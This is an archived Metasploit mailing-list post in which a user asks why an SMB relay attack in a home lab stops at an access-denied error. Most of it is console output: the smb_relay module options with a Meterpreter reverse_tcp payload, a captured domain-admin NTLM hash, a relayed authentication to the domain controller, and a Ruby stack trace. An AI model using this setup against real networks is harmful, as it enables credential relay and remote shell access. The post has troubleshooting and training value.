Metasploit mailing list archives

SMB_RELAY attacks still possible?


From: Brian S Traveling <epicdonk () gmail com>
Date: Fri, 24 Dec 2010 13:22:15 -0700

Hi,

Is it possible to still carry out smb_relay attacks by specifying a
different SMBHOST?  It doesn't seem to be working for me...  I was
under the assumption it was still possible...

my test environment:
domain controller: 192.168.0.1 (also dhcp/router)
windows 7 workstation: 192.168.0.2 (clicking the UNC path - joined to domain)
metasploit box: 192.168.0.35 (not joined to domain)


msf exploit(smb_relay) > show options

Module options:

  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  SMBHOST     192.168.0.1      no        The target SMB server (leave empty for originating system)
  SRVHOST     192.168.0.35     yes       The local host to listen on.
  SRVPORT     445              yes       The local port to listen on.
  SSL         false            no        Negotiate SSL for incoming connections
  SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)


Payload options (windows/meterpreter/reverse_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique: seh, thread, none, process
  LHOST     192.168.0.35     yes       The listen address
  LPORT     4444             yes       The listen port


Exploit target:

  Id  Name
  --  ----
  0   Automatic


msf exploit(smb_relay) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.0.35:4444
[*] Server started.
msf exploit(smb_relay) > [*] Received 192.168.0.2:62573 MYDOMAIN\domainadmin LMHASH:000000000000000000000000000000000000000000000000 NTHASH:91fw9w155441a411b1a40edf8d7adlf70101000000000000a2cwcbd785a2cb020f640031811663700000000020000000000000000000000 OS: LM:
[*] Authenticating to 192.168.0.1 as MYDOMAIN\domainadmin...
[*] AUTHENTICATED as MYDOMAIN\domainadmin...
[*] Connecting to the ADMIN$ share...
[*] Error processing request from 192.168.0.2:62573 (115): Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_ACCESS_DENIED (Command=117 WordCount=0)
/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:176:in `smb_recv_parse'
/opt/metasploit3/msf3/lib/rex/proto/smb/client.rb:994:in `tree_connect'
/opt/metasploit3/msf3/lib/rex/proto/smb/simpleclient.rb:253:in `connect'
(eval):133:in `smb_haxor'
(eval):530:in `smb_cmd_session_setup'
(eval):332:in `smb_cmd_dispatch'
/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:716:in `smb_recv'
/opt/metasploit3/msf3/lib/msf/core/exploit/smb.rb:647:in `on_client_data'
/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:386:in `start_service'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in `call'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:45:in `on_client_data'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:182:in `monitor_clients'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in `each'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:180:in `monitor_clients'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:69:in `start'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `call'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `call'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `initialize'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `new'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `spawn'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/rex/io/stream_server.rb:68:in `start'
/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:393:in `start_service'
/opt/metasploit3/msf3/lib/msf/core/exploit/tcp.rb:313:in `exploit'
/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:201:in `job_run_proc'
/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:148:in `run'
/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `call'
/opt/metasploit3/msf3/lib/rex/job_container.rb:36:in `start'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `call'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `call'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:64:in `spawn'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `initialize'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `new'
/opt/metasploit3/msf3/lib/msf/core/thread_manager.rb:57:in `spawn'
/opt/metasploit3/msf3/lib/rex/thread_factory.rb:21:in `spawn'
/opt/metasploit3/msf3/lib/rex/job_container.rb:31:in `start'
/opt/metasploit3/msf3/lib/rex/job_container.rb:155:in `start_bg_job'
/opt/metasploit3/msf3/lib/msf/core/exploit_driver.rb:145:in `run'
/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:125:in `exploit_simple'
/opt/metasploit3/msf3/lib/msf/base/simple/exploit.rb:147:in `exploit_simple'
/opt/metasploit3/msf3/lib/msf/ui/console/command_dispatcher/exploit.rb:154:in `cmd_exploit'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `send'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:246:in `run_command'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:208:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `each'
/opt/metasploit3/msf3/lib/rex/ui/text/dispatcher_shell.rb:202:in `run_single'
/opt/metasploit3/msf3/lib/rex/ui/text/shell.rb:143:in `run'
/usr/local/bin/msfconsole:124/SMBRelay

Thanks!